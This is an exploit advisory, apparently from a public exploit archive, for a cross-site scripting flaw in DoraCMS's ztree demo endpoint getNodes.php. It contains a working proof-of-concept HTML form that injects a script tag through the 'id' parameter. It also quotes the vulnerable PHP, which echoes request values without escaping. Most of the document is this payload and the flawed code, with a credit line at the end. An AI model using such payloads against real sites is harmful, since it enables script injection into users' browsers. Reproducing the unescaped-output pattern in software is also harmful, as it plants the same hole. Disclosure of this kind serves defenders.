DoraCMS Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>DoraCMS Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title: DoraCMS Cross Site Scripting |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Download Link : https://github.com/doramart/DoraCMS |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 12 /29 / 2016 |=============================================================| |[+] Exploit Code: <HTML> <HEAD><TITLE>DoraCMS Cross Site Scripting</TITLE></HEAD> <BODY> <form action="http://127.0.0.1/DoraCMS-master/public/plugins/ztree/demo/cn/asyncData/getNodes.php" method="post"> <input type="hidden" name="n" value="n1" /> <input type="hidden" name="lv" value="0" /> <input type="hidden" name="id" value="1.3'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>" /> <input type="hidden" name="otherParam" value="M.R.S.L.Y" /> </form> </BODY> </HTML> ============================================================ Vulnerable code : <?php ?> [<?php $pId = "0"; $pName = ""; $pLevel = ""; $pCheck = ""; if(array_key_exists( 'id',$_REQUEST)) { $pId=$_REQUEST['id']; } if(array_key_exists( 'lv',$_REQUEST)) { $pLevel=$_REQUEST['lv']; } if(array_key_exists('n',$_REQUEST)) { $pName=$_REQUEST['n']; } if(array_key_exists('chk',$_REQUEST)) { $pCheck=$_REQUEST['chk']; } if ($pId==null || $pId=="") $pId = "0"; if ($pLevel==null || $pLevel=="") $pLevel = "0"; if ($pName==null) $pName = ""; else $pName = $pName."."; //for ($i=1; $i<9999; $i++) { // for ($j=1; $j<999; $j++) { // // } //} for ($i=1; $i<5; $i++) { $nId = $pId.$i; $nName = $pName."n".$i; echo "{ id:'".$nId."', name:'".$nName."', isParent:".(( $pLevel < "2" && ($i%2)!=0)?"true":"false").($pCheck==""?"":((($pLevel < "2" && ($i%2)!=0)?", halfCheck:true":"").($i==3?", checked:true":"")))."}"; if ($i<4) { echo ","; } } ?>] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>